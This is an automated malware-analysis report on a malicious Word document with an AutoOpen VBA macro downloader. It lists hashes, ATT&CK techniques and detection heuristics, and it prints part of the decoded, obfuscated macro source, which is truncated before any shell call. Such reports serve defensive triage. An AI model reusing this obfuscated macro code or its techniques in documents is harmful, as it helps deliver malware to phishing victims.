Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 400b5c4a48c6f78b…

MALICIOUS

Office (OLE)

87.5 KB Created: 2017-10-23 10:49:00 Authoring application: Microsoft Office Word First seen: 2017-10-28
MD5: 31c6770b6d4215aa562af01b879d16e8 SHA-1: 08ebf244861be6a737097f85bf0945c2fe329e1f SHA-256: 400b5c4a48c6f78b8ca308e20cd6329c5ce3caf65787044aaee3a6f668905fcc
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function, which is a common technique for malicious documents. The macro utilizes a Shell() call, indicating an attempt to execute external commands. This strongly suggests the document is designed to download and execute a secondary payload, aligning with the characteristics of a macro-based downloader.

Heuristics 8

  • ClamAV: Doc.Macro.Obfuscation-6355576-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 50761 bytes
SHA-256: 922b18e247b353204a6bb450c4305dcb83526aff1b2552b99d415952f3974b6d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 88 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Function WEiJojnzb()
DCcvOTtuYZ = "1R02TUCOIXJWOAcvkUdfWBdOoNMJWiPPuGljmbZJhdBNQOhfoXmYizWqRiMQhjMJzLZnPtJJuUwtAPwafjUwvrkukuRHOJbAQrQFpuQvNddKBdqCjmlALNNFbiDUcBulszcIwsllQZkSNZtGEObcXaoDiLdLqvSMjsSDBhDnAAkmcvsBkwPNZSNSJYinPauUHYiVHpFXLocXqCaiTcatjFmRiAucCQYZGPiEMWuursClqqbGwvUmAAoBlRrHvdUuQCRaXWWwifCnDBbnYniHwlZFbdSufmz2QF"
LWFvDaJ = Mid(DCcvOTtuYZ, 14, 274)
zzzLzKCt = LWFvDaJ
GqdlLZTzRn = "1EBUCU45OVW1NDQ4VSZ8KNazztEGMuZDAzSkIRcUaLWtUJIQBbFrINzDvHVjYEKsnswtzbkoJCTp773"
suAXUaoMmiC = Mid(GqdlLZTzRn, 23, 54)
MJPRVriBYOp = suAXUaoMmiC
ZXXBX = "Q5G4P9JJA72YC5IQFPP9GDMDrspDrsjhPjFzDYbDNpIMotHnXVGI4QBE7JGOT3U"
nFbEqwhvoo = Mid(ZXXBX, 25, 24)
NiwRqoPinZ = nFbEqwhvoo
mhWjRTuNp = "5XA5LRPZJARENUNHjNAKqzFOlqWANSBpEWwREADBwJIhJtXqctsGjNKLPqSwjWcHbrPizvCjKzMhoXFsTfXTavGqLlCOhERbjAGSiothqX001I9DELLYE1ZXADSS8"
mRfGjw = Mid(mhWjRTuNp, 15, 91)
TpwRAOd = mRfGjw
KXDcabSzH = "8FNKAY7EVDSL9FKzNitDnNHFFYtMkRwizGZnlSzlmlUukzzmMETCjrlhLlzTZJrSKHNEHWOvjIRBtNVHbHzfztwIUsbzUfLcuBjcksiqqXTbZjnwQprSKLUQJFjPuOaDwpHrdsXjdIpaaWikEdjfntRjhTTfIPwczPfjcwVXRIoBVuqmWwKRfuQCXYKJZsaOMMcLrzIIHLNfFPNmdjIJFizCzcLEmLwZhaoIRiuXqCKUhkzRWX"
TmSsTVhIKA = Mid(KXDcabSzH, 15, 225)
YAEMik = TmSsTVhIKA
lXwQvrsT = "L2W4EPLTEVR5TEQtkznPAIGaaETUwScFZTmMjVGnBwYsmbaCQjYTUCimlwwqVIBcGoWloDMOrzNEjOowiREPtJkXkAbiZPRtuvmzFpNMWKbUoiCXJzMEEmizDwBociobhUJobMMJZ54NAKLB"
VNNlZ = Mid(lXwQvrsT, 15, 119)
iXwjiGSVz = VNNlZ
kdkFIuu = "MFVQ9VJXFWcVOiEtPiFpQRGsrTfkmjOHsmTjGCiHwwGNnFwljJFQHziNULdiGAjWFVccKXnMwwqRLsFlWtBcJE"
tspiaRwQTCB = Mid(kdkFIuu, 11, 74)
BZpIva = tspiaRwQTCB
KVaUnAtO = "3IMZIwkBdWrlafEzIhjkYXMsoBFhkAoRmOilqcRzWohOLcHZNcXTZhFRhoCHqCRdiawMASJjQhOjpzhMufUHdUrFINEBaKIUXEjldvZuTrCsTWbjHqMLhMVI3BN7SM3"
rjPKoc = Mid(KVaUnAtO, 5, 113)
hmiWAi = rjPKoc
GTPiizt = "F48M0QAGO0WZdXEmKEsHVwiLqNckpAcUjYAIUFEoGWpadhTEt10"
RoMuDfRfaXj = Mid(GTPiizt, 11, 39)
baVEzIa = RoMuDfRfaXj
EPEzR = "NRLT6MYFMPLIY9D9ZB1HKXjtjRJiPaLPnDVvMowiaEUwllTCUGOWWW9OEHDKYLNDX4"
BCHazsVzGR = Mid(EPEzR, 20, 30)
EjjMUu = BCHazsVzGR
wvaunDUNjwp = "25ZQRFKUZSMHFPOYHUnZBjbZXEUwAwkqDjHwNwfcLwuDbRvfoPvjnOWEChYjFHaiiDbDsPLIpLNCoYzGJoKlDDDpMDwfazXEXQUXpsnYDnrbATPikSXQzoafAmqpTjiqoJfYDZRQBliQMcptnRvIcGHjppXDCwFXEBmqorbKBGPLGKSXwwBBkaOhBwiNBOOCfKLLpwEvqkHVrvciWAGFwEmimFpsN4GSK4G2MDGLU9ZRFL3F3UN"
RGbLO = Mid(wvaunDUNjwp, 15, 206)
TlwZOw = RGbLO
bUpDDCLmq = "9038ZU2OTOM68JYF3M7U1N538QYS1HCSINInsMjwzHiwrGKASsqGTEqBHIGbXjYkJMndbUciPffPRHNqtmLuOiYEWHfjGEYSjwofShYwPMqnYbjAuQikViWanjGUptYLGNfTShXLONiBskfvXioqVowFcOrjbDJWofjLvQhNsWWIzUiCDKzKEhpSQZrEpokLDHNMDUzGzbzzSoFHfpfQFzSGqOu5ET04RN"
UwMDV = Mid(bUpDDCLmq, 33, 187)
XvmssNwtr = UwMDV
NXwMYlDzzc = "CXWWG0VUQZksVAJDEC6G5LK97VM9UVR7"
iIjSuiAYDOq = Mid(NXwMYlDzzc, 10, 5)
rHNZhdMChBP = iIjSuiAYDOq
XTIZWZEEKMW = "A35L2AEKmzzYTnSXwUztudHaNYjDiuDGWptboGHXZAdifcEDXLtarhcjRSXsIitrvtBiuqisMaTuNSKIWE"
mZMjscn = Mid(XTIZWZEEKMW, 9, 68)
EdwSi = mZMjscn
vVQfUOsuWqr = "I6H839QECEJUhoTwitfzimukLEWJLzMsqWnHVLjijNczadNnwFcaZLmFKncvijiGSRdLFN3T7XBCL4"
wVzHu = Mid(vVQfUOsuWqr, 11, 58)
HWvwnDrhPfR = wVzHu
NcpmVZPhOUI = "PGozEttFf6ZU68GZDW8PG8BUCWB69NFVAD9O"
JAKHjFMYwF = Mid(NcpmVZPhOUI, 3, 7)
NlRQjq = JAKHjFMYwF
kLavOq = "TVVD0AMcXMzRVJzJiqiLGXlSfkizXE5B95"
wHbOzIPbAD = Mid(kLavOq, 6, 23)
jrMuLY = wHbOzIPbAD
RWEAA = "UGNS5WFIFQCiilzzfViJzCmmcFOcuQwMduFzXbjhwwaSPuoazTpnSAiovZdRWqlTlkFnjAZDmzLBbTWiQniabItdMRDzwRKHNHhipBuztmBVojMcCvBjMKsdqbaPwbFUnDnTmrtOtjjpGYojEbvDPbvCPDoNbfASjhiksspKBnqfiDWSmuKVjCEMIlEiDjnNjOIZpEnMlkBclPYMjWajVildcWcHoGHVzcwQuzciHwjwAbatNrCjFGsBciwTbjYfcjcIQHRjusZWvpcAvjtwEaCHCF"
ZPYwKswqABm = Mid(RWEAA, 12, 267)
nkiiUklP = ZPYwKswqABm
zaroQ = "0IVBB02JWOQJQ3DQGhdqlnElohvmzOoAwtvVBdGcLOQarRiGuKwNifzkAZDFwLvlmjsPGzodbAfWXduXzpsnSaWRvKVbZAfzTfoHZTzzWTmdzbNWfjGHTHSLNbTwbMDaVfCspmwjpvRwosRUzzwtuXjLMctwzDVJQLHTYUjsiaSXqUXVJ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.